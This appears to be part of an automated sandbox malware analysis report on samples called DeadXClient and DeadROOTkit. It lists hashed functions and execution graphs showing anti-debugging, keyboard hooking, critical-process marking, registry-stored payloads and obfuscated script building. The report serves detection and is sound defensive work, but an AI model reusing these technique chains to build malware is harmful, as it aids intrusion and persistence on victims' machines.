                                                        • Instruction ID: 7edf8d6616eea141de39afd172cc169025a750e0e6aa0d2d563669e9a269b6e2
                                                        • Opcode Fuzzy Hash: e052c81b95288aeaee0bb333dc1d1754dfd53e4762370cddc7b2805b65ab3140
                                                        • Instruction Fuzzy Hash: 9E415D20B1DA4E0FE795AB7C54655B93BD2DFC6214B4901FBE44DC72EBDC185C028346
                                                        Function 00007FFD9B7F0760 Relevance: .2, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72a56239f88803199eb0669bb56933162dbb702757c4fabcc915667006362d20
                                                        • Instruction ID: a9d76b098fb868ba056d7518a25827ad552143939f46e7356972396d4d519a4a
                                                        • Opcode Fuzzy Hash: 72a56239f88803199eb0669bb56933162dbb702757c4fabcc915667006362d20
                                                        • Instruction Fuzzy Hash: F4417D74A09A1D8FEBA8EF98D469BB977E4FB54311F10016EE00AC36A1CB75E841CB45
                                                        Function 00007FFD9B7F8A31 Relevance: .1, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c4430380b8d97101c895e975d49c0394b9dbebb3aa61d62f9564b5bcdccd545
                                                        • Instruction ID: 3d6030fdc92a31ed5575856a4c947cb2b78f3498bd5994aec0a1d7aff3a084d6
                                                        • Opcode Fuzzy Hash: 1c4430380b8d97101c895e975d49c0394b9dbebb3aa61d62f9564b5bcdccd545
                                                        • Instruction Fuzzy Hash: A141D571B09A4D8FDF94EBB884696BD7BF1EF58300B05027AD40DD72A2DF28A8418745
                                                        Function 00007FFD9B7F06F0 Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f91fc7e9c5e7d593f77d725e6bcc1778d4d4d4259e9f4166ded8fce9ab3cda7
                                                        • Instruction ID: 8657bdab8ce96cb95bed1b690ff05607844511350da1730386f2d034b212b0a5
                                                        • Opcode Fuzzy Hash: 8f91fc7e9c5e7d593f77d725e6bcc1778d4d4d4259e9f4166ded8fce9ab3cda7
                                                        • Instruction Fuzzy Hash: 4841C630F0CA0E4FDBA8EBA884656B977D1EF54310F55027DE42ED32E6CE28A9418785
                                                        Function 00007FFD9B7F04C8 Relevance: .1, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57a23bbd6c09e318e158fc90ece7fa77fd78bcee0ea1728e3f61c6095a77f431
                                                        • Instruction ID: 4700ca011bff9c9e692f52af7141cdea5562932ed437d399724f55c26dde5c00
                                                        • Opcode Fuzzy Hash: 57a23bbd6c09e318e158fc90ece7fa77fd78bcee0ea1728e3f61c6095a77f431
                                                        • Instruction Fuzzy Hash: 7931E421B1C94D0FE798EE2C846A678B6C2EF98355F0505BEE01EC32E7DD24AC428385
                                                        Function 00007FFD9B7F0AB0 Relevance: .1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c0ccbaedfc36f7db1ca24df7ad1b99610aae811cfabad8da8e233d0afced1f9
                                                        • Instruction ID: 0b5ca19090fc6683274ccde96b448ec26d275bca571b7b460f0ab8b41a5ca439
                                                        • Opcode Fuzzy Hash: 1c0ccbaedfc36f7db1ca24df7ad1b99610aae811cfabad8da8e233d0afced1f9
                                                        • Instruction Fuzzy Hash: 0A31C111F2890E4BEB98BFAC58697BD76D2EFD8705F41027AE41DC32D6DD18A8014382
                                                        Function 00007FFD9B7F0949 Relevance: .1, Instructions: 112COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fb51bce2932ea651b2861cb7fc0f7e194480570cd75b768a2460b5d9dd29634
                                                        • Instruction ID: 7a29d0411028b199225aeefca22f25bc56878eccf02150722627c0c78a56d60c
                                                        • Opcode Fuzzy Hash: 2fb51bce2932ea651b2861cb7fc0f7e194480570cd75b768a2460b5d9dd29634
                                                        • Instruction Fuzzy Hash: C831B534B18A4E8FEB44EBA88465AFDBBB1FF98300F5105B9D019D33DACE3869018745
                                                        Function 00007FFD9B7F9A75 Relevance: .1, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26d950455e13000dfca3e8fe13dc1ce3e9b2a7b2c497f536a042fe07589fd119
                                                        • Instruction ID: 07a96ef277a0108a0d394a209e4ac583073d9d4036d3853283d35da58680ae3b
                                                        • Opcode Fuzzy Hash: 26d950455e13000dfca3e8fe13dc1ce3e9b2a7b2c497f536a042fe07589fd119
                                                        • Instruction Fuzzy Hash: 7331703190DB888FDB55DBA8D849AE9BBF0FF56320F0482AFD089C7562D774A805CB51
                                                        Function 00007FFD9B7F88F9 Relevance: .1, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 78cfc18e036ed494def4c246c508f6add05f13f1d4a626fc76da1d14952f1cf1
                                                        • Instruction ID: 1eed76dbd9b1597b472fc51d896c4e2793bd2a86ad1bed635381c592532f3f21
                                                        • Opcode Fuzzy Hash: 78cfc18e036ed494def4c246c508f6add05f13f1d4a626fc76da1d14952f1cf1
                                                        • Instruction Fuzzy Hash: 3231DD30B5DA9D9FDB56EB3CC8959663BF1EF16300B4505A6D048C72E6CB38B841C78A
                                                        Function 00007FFD9B7F9271 Relevance: .1, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 947cf1af95b04d0970d9e27c4a25648f6d949ec8c325183eeb83fe19262879e5
                                                        • Instruction ID: 7cf4ae5ac8cfaf3f61259d99a07e85a2fd9d66aae4f109007e9f72dada892db7
                                                        • Opcode Fuzzy Hash: 947cf1af95b04d0970d9e27c4a25648f6d949ec8c325183eeb83fe19262879e5
                                                        • Instruction Fuzzy Hash: 46212B31F0DA0D4FDB68EB5884A9ABCB7E1EF94350F01017ED00ED32E5CE24A9418782
                                                        Function 00007FFD9B7F9999 Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1576540d7344a67964a66959a9e4777cc9c9d922295c16efe15697d097922ea9
                                                        • Instruction ID: d0294675c766df894dc362eff7eb5cf6cdf37cf74240ce04d2e80bc5acc3a3e3
                                                        • Opcode Fuzzy Hash: 1576540d7344a67964a66959a9e4777cc9c9d922295c16efe15697d097922ea9
                                                        • Instruction Fuzzy Hash: 1A213B30B4D68E0FD7559B6488659F63BD5EFCA204F0642B6E08DC71B2CD1C9941C791
                                                        Function 00007FFD9B7F0770 Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3791783e53ef3360d9ba41bf5bc3a3a5cb93c674091c2b6360cbaf33649c5a9
                                                        • Instruction ID: 91fe490efc3637e6474d6ed640ee0a742622b156053282ba6b80257dfceda90e
                                                        • Opcode Fuzzy Hash: a3791783e53ef3360d9ba41bf5bc3a3a5cb93c674091c2b6360cbaf33649c5a9
                                                        • Instruction Fuzzy Hash: 5E11E614B1C95D5AE754B7AC946ABBD76D6EF88700F5242B8F01CC32DACD28B90083C6
                                                        Function 00007FFD9B7F8470 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 549ff034f313082d2aad155886209900aa91dc8a496b4bd2da917aa232895455
                                                        • Instruction ID: 1f6b73d90cd2c664d717d523b9eece3593be5262a8034735652d6f6c34639af9
                                                        • Opcode Fuzzy Hash: 549ff034f313082d2aad155886209900aa91dc8a496b4bd2da917aa232895455
                                                        • Instruction Fuzzy Hash: 0201E131F1CA9D4FEB52EBA848265BDBBA1FF45310B0402B6E418C31E6DF18694583CA
                                                        Function 00007FFD9B7F2311 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 795cdd15f11294058ba31c8440156a3a86e19c7a9051f0f0d9d14b6cd1eddabb
                                                        • Instruction ID: 180855ee596fc957c75b3b6871d3f9f2b5610834ea7b00e9327f5ea4771c1a11
                                                        • Opcode Fuzzy Hash: 795cdd15f11294058ba31c8440156a3a86e19c7a9051f0f0d9d14b6cd1eddabb
                                                        • Instruction Fuzzy Hash: B2F05E6199F3C91FD71347B05C355E57FB4AF43104B4E42DBE488CB0B3D618661983A2
                                                        Function 00007FFD9B7F1951 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 283acb9760ca52674df5476b8a8d00add65ef84b5882dc68e318512f4d6a6a60
                                                        • Instruction ID: ad5893f251874b814673ad6838c2dd2d515892af74f395ba62fc6c697890e255
                                                        • Opcode Fuzzy Hash: 283acb9760ca52674df5476b8a8d00add65ef84b5882dc68e318512f4d6a6a60
                                                        • Instruction Fuzzy Hash: D3017614B0DBC90FE356EB386868571BFE0DF96610B0906FFE488C61B7D9086B8183C2
                                                        Function 00007FFD9B7F1DE0 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ee7347f818fa238386abc1287148dcd21f398cb2f55b76a0b0ab9ef8c1065f1
                                                        • Instruction ID: 50604d165d7b597585b896575c366a77562995d7cfd805aa4fac7201697d8fbc
                                                        • Opcode Fuzzy Hash: 3ee7347f818fa238386abc1287148dcd21f398cb2f55b76a0b0ab9ef8c1065f1
                                                        • Instruction Fuzzy Hash: 9AF0AF71F0491D4BDB40EFA888995FE7BF0EF58305F400267E42DD2299DE346A4087C1
                                                        Function 00007FFD9B7F260D Relevance: .0, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c548eb2848afb53d6743a76341b02b3146200bac7105cb5dc886cdbc39e6e2cb
                                                        • Instruction ID: 5dc8460685e3715db86905f47853411ca2e99cb055fa3ff69973a159230d27da
                                                        • Opcode Fuzzy Hash: c548eb2848afb53d6743a76341b02b3146200bac7105cb5dc886cdbc39e6e2cb
                                                        • Instruction Fuzzy Hash: 63F0D110F1D64E0BFB656AF848756B83A91EF84308F8101B9E01AC62FBDE1C6C4282C6
                                                        Function 00007FFD9B7F2474 Relevance: .0, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eed93b378f0630939ab572fbc535fc4d158a0c02c0e36aa1e35c47f37092ce94
                                                        • Instruction ID: 2e07b37477c26b1e813f5bf1f1db225c7d8671ad8d9f63bfd0acba24a1e109fa
                                                        • Opcode Fuzzy Hash: eed93b378f0630939ab572fbc535fc4d158a0c02c0e36aa1e35c47f37092ce94
                                                        • Instruction Fuzzy Hash: 98E08C10D1E2C70ED70766F408628A07F205F07160B8A02B2E4588A1E3D89C245983A6
                                                        Function 00007FFD9B7F0775 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3038413567.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7ffd9b7f0000_DeadXClient.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 389bf48f066dfd914a10b99745cc3ea860b15e706e8e1da946d07c16f2d6d5be
                                                        • Instruction ID: 876c29e8ddc8b2a45892b0ca9b002ffbea6ff29af2d83dd9096c99573024b7cd
                                                        • Opcode Fuzzy Hash: 389bf48f066dfd914a10b99745cc3ea860b15e706e8e1da946d07c16f2d6d5be
                                                        • Instruction Fuzzy Hash: D0B09200F7F54A40D8243AB9086A0B8BFA09B8A120FC606F0D489C01B2D84DAAD646D6

                                                        Execution Graph

                                                        Execution Coverage:21%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:30%
                                                        Total number of Nodes:10
                                                        Total number of Limit Nodes:0
                                                        execution_graph 4701 7ffd9b8095c1 4702 7ffd9b809573 4701->4702 4702->4701 4703 7ffd9b809642 RtlSetProcessIsCritical 4702->4703 4704 7ffd9b8096a2 4703->4704 4693 7ffd9b8096e4 4694 7ffd9b8096ed SetWindowsHookExW 4693->4694 4696 7ffd9b8098a3 4694->4696 4697 7ffd9b8078c1 4698 7ffd9b8078df CheckRemoteDebuggerPresent 4697->4698 4700 7ffd9b80797f 4698->4700

                                                        Executed Functions

                                                        Function 00007FFD9B8078C1 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.3030720722.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ffd9b800000_DeadROOTkit.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 53843e7e15153dc68be4de351468f78979ec84dc8f59660a8d135f462c6c6647
                                                        • Instruction ID: c148af3ce2a1150ae2db7a5a07d3337ea0d48db25c01f34dae88a7f43f225c31
                                                        • Opcode Fuzzy Hash: 53843e7e15153dc68be4de351468f78979ec84dc8f59660a8d135f462c6c6647
                                                        • Instruction Fuzzy Hash: 8B51313190D68C8FCB56DB6888556E97FE0EF5A310F0902ABD489C7192CA38A905C792
                                                        Function 00007FFD9B8096E4 Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.3030720722.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ffd9b800000_DeadROOTkit.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: a5f9f430aa8b6a5c41affc2079810cc53d61d77f0fcdaf284401445d12e291db
                                                        • Instruction ID: 916d4cda4680759349340c70cd62e1275164b53cc13a884901e91d61ef56a426
                                                        • Opcode Fuzzy Hash: a5f9f430aa8b6a5c41affc2079810cc53d61d77f0fcdaf284401445d12e291db
                                                        • Instruction Fuzzy Hash: 4D710631A0CA4C8FDB59DF6CD8596F9BBE0EF59321F04426ED059D3292CB75A806CB81
                                                        Function 00007FFD9B8095C1 Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 355 7ffd9b8095c1-7ffd9b8095c5 356 7ffd9b8095c7-7ffd9b8095c8 355->356 357 7ffd9b8095ca-7ffd9b8095d9 355->357 356->357 358 7ffd9b8095db 357->358 359 7ffd9b8095dc-7ffd9b8095e9 357->359 358->359 360 7ffd9b809573-7ffd9b809582 359->360 361 7ffd9b8095eb-7ffd9b80963a 359->361 360->355 364 7ffd9b809642-7ffd9b8096a0 RtlSetProcessIsCritical 361->364 365 7ffd9b8096a2 364->365 366 7ffd9b8096a8-7ffd9b8096dd 364->366 365->366
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.3030720722.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ffd9b800000_DeadROOTkit.jbxd
                                                        Similarity
                                                        • API ID: CriticalProcess
                                                        • String ID:
                                                        • API String ID: 2695349919-0
                                                        • Opcode ID: fb0e7281cc858a9724516f6d93021fe38bf4d2a5939dc3724fd793b889e3f785
                                                        • Instruction ID: 5498154486360c7f5c7e350a9e764024af9bf61f4f938370c5e675519dff6605
                                                        • Opcode Fuzzy Hash: fb0e7281cc858a9724516f6d93021fe38bf4d2a5939dc3724fd793b889e3f785
                                                        • Instruction Fuzzy Hash: 6B41243190C6588FDB28DB98D859AFABBF0EF55311F04416EE0DAD3592CA35A542CB81

                                                        Execution Graph

                                                        Execution Coverage:72.1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:34.7%
                                                        Total number of Nodes:101
                                                        Total number of Limit Nodes:11
                                                        execution_graph 237 b01799 240 b017a6 FindResourceA 237->240 241 b0179e ExitProcess 240->241 242 b017c6 SizeofResource 240->242 242->241 243 b017d9 LoadResource 242->243 243->241 244 b017e5 LockResource RegOpenKeyExW 243->244 244->241 245 b0180c RegSetValueExW 244->245 245->241 246 b01823 245->246 258 b01869 GetProcessHeap HeapAlloc StrCpyW 246->258 250 b01836 251 b01672 9 API calls 250->251 252 b01842 251->252 305 b0112d GetCurrentProcess IsWow64Process 252->305 256 b01855 256->241 318 b01518 SysAllocString SysAllocString CoInitializeEx 256->318 328 b01157 258->328 260 b01894 261 b018c6 StrCatW StrCatW 260->261 262 b0189e StrCatW 260->262 331 b019e2 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 261->331 264 b0112d 2 API calls 262->264 265 b018ab StrCatW StrCatW 264->265 265->261 270 b01987 6 API calls 271 b018f1 270->271 272 b01987 6 API calls 271->272 273 b018fd 272->273 274 b01987 6 API calls 273->274 275 b01909 274->275 276 b01987 6 API calls 275->276 277 b01915 276->277 278 b01987 6 API calls 277->278 279 b01921 278->279 280 b01987 6 API calls 279->280 281 b0192d 280->281 282 b01987 6 API calls 281->282 283 b01939 282->283 284 b01987 6 API calls 283->284 285 b01945 284->285 286 b01987 6 API calls 285->286 287 b01951 286->287 288 b01987 6 API calls 287->288 289 b0195d 288->289 290 b01987 6 API calls 289->290 291 b01969 290->291 292 b01987 6 API calls 291->292 293 b01975 292->293 294 b01987 6 API calls 293->294 295 b01828 294->295 296 b01672 SysAllocString SysAllocString CoInitializeEx 295->296 297 b01783 296->297 298 b016a5 CoInitializeSecurity 296->298 301 b01786 SysFreeString SysFreeString 297->301 299 b016c6 CoCreateInstance 298->299 300 b016bb 298->300 302 b0172d CoUninitialize 299->302 303 b016ea VariantInit 299->303 300->299 300->302 301->250 302->301 303->302 306 b0114c 305->306 307 b011ab 7 API calls 306->307 308 b01207 CoInitializeSecurity 307->308 309 b014ee 307->309 310 b01228 CoCreateInstance 308->310 311 b0121d 308->311 312 b014f1 6 API calls 309->312 313 b0124a VariantInit 310->313 317 b01442 CoUninitialize 310->317 311->310 311->317 312->256 315 b0128d 313->315 316 b013db VariantInit VariantInit VariantInit 315->316 315->317 316->317 317->312 319 b0154b CoInitializeSecurity 318->319 320 b0165d SysFreeString SysFreeString 318->320 321 b01561 319->321 322 b0156c CoCreateInstance 319->322 320->241 321->322 323 b01657 CoUninitialize 321->323 322->323 324 b0158e VariantInit 322->324 323->320 325 b015d1 324->325 326 b01629 325->326 327 b01603 VariantInit 325->327 326->323 327->326 351 b0118c GetModuleHandleA 328->351 330 b01176 330->260 354 b01000 CryptAcquireContextW 331->354 334 b01a38 StrStrIW 339 b01a9e 334->339 335 b018d9 344 b01987 lstrlenW 335->344 336 b01b72 6 API calls 336->335 337 b01a58 StrStrIW StrNCatW StrCatW 338 b01b42 StrCatW StrStrIW 337->338 337->339 338->339 339->336 339->337 340 b01afc StrCatW StrNCatW 339->340 341 b01b28 StrCatW 339->341 342 b01ae0 StrCatW StrCatW 339->342 343 b01b19 StrCatW 340->343 341->338 341->339 342->343 343->341 357 b0104f 344->357 347 b019b4 StrStrIW 348 b018e5 347->348 349 b019c0 347->349 348->270 350 b019c1 StrStrIW 349->350 350->348 350->350 352 b011a8 351->352 353 b0119b GetProcAddress 351->353 352->330 353->330 355 b01048 354->355 356 b0102a CryptGenRandom CryptReleaseContext 354->356 355->334 355->335 356->355 358 b01000 3 API calls 357->358 359 b0107a 358->359 359->347 359->348

                                                        Callgraph

                                                        Executed Functions

                                                        Function 00B019E2 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 166memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00008000,75B12EB0,00000000,00B02230), ref: 00B019F5
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B01A02
                                                        • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00B01A16
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B01A1D
                                                          • Part of subcall function 00B01000: CryptAcquireContextW.ADVAPI32(00B01A30,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00B01A30), ref: 00B01020
                                                          • Part of subcall function 00B01000: CryptGenRandom.ADVAPI32(00B01A30,00004000,00000000,?,00B01A30), ref: 00B0102F
                                                          • Part of subcall function 00B01000: CryptReleaseContext.ADVAPI32(00B01A30,00000000,?,00B01A30), ref: 00B01042
                                                        • StrStrIW.KERNELBASE(?,00B037F0), ref: 00B01A47
                                                        • StrStrIW.SHLWAPI(00000002,00B037F0), ref: 00B01A6E
                                                        • StrNCatW.SHLWAPI(00000000,?,?), ref: 00B01A85
                                                        • StrCatW.SHLWAPI(00000000,00B037F4), ref: 00B01A91
                                                        • StrCatW.SHLWAPI(?,'+[Char](), ref: 00B01AE9
                                                        • StrCatW.SHLWAPI(?,?), ref: 00B01AF3
                                                        • StrCatW.SHLWAPI(?,'+'), ref: 00B01B1D
                                                        • StrCatW.SHLWAPI(00000000,?), ref: 00B01B2D
                                                        • StrCatW.SHLWAPI(00000000,00B037F4), ref: 00B01B48
                                                        • StrStrIW.SHLWAPI(?,00B037F0), ref: 00B01B62
                                                        • StrCatW.SHLWAPI(00000000,?), ref: 00B01B76
                                                        • StrCpyW.SHLWAPI(?,00000000), ref: 00B01B7D
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B01B8B
                                                        • HeapFree.KERNEL32(00000000), ref: 00B01B94
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B01B9A
                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00B01B9D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1704154695.0000000000B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B00000, based on PE: true
                                                        • Associated: 00000003.00000002.1704125051.0000000000B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000003.00000002.1704207253.0000000000B02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_b00000_DeadCodeRootKit.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                        • String ID: '+'$'+[Char]($)+'
                                                        • API String ID: 3510167801-3465596256
                                                        • Opcode ID: 098ce96fb108d946fa9029e78a7c4cd2ecdc82d27bf8132f4d8fcfea21776453
                                                        • Instruction ID: 36952fbbb9bae42e1dcaeb6990e761f157e29b1c25b6b1a52d24b56aa3d6f551
                                                        • Opcode Fuzzy Hash: 098ce96fb108d946fa9029e78a7c4cd2ecdc82d27bf8132f4d8fcfea21776453
                                                        • Instruction Fuzzy Hash: 6051DEB1E00219ABCB14DBA8DD4D9AEBBFDFB48700B14445AE505E7290EA759A05CB60
                                                        Function 00B017A6 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 73registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
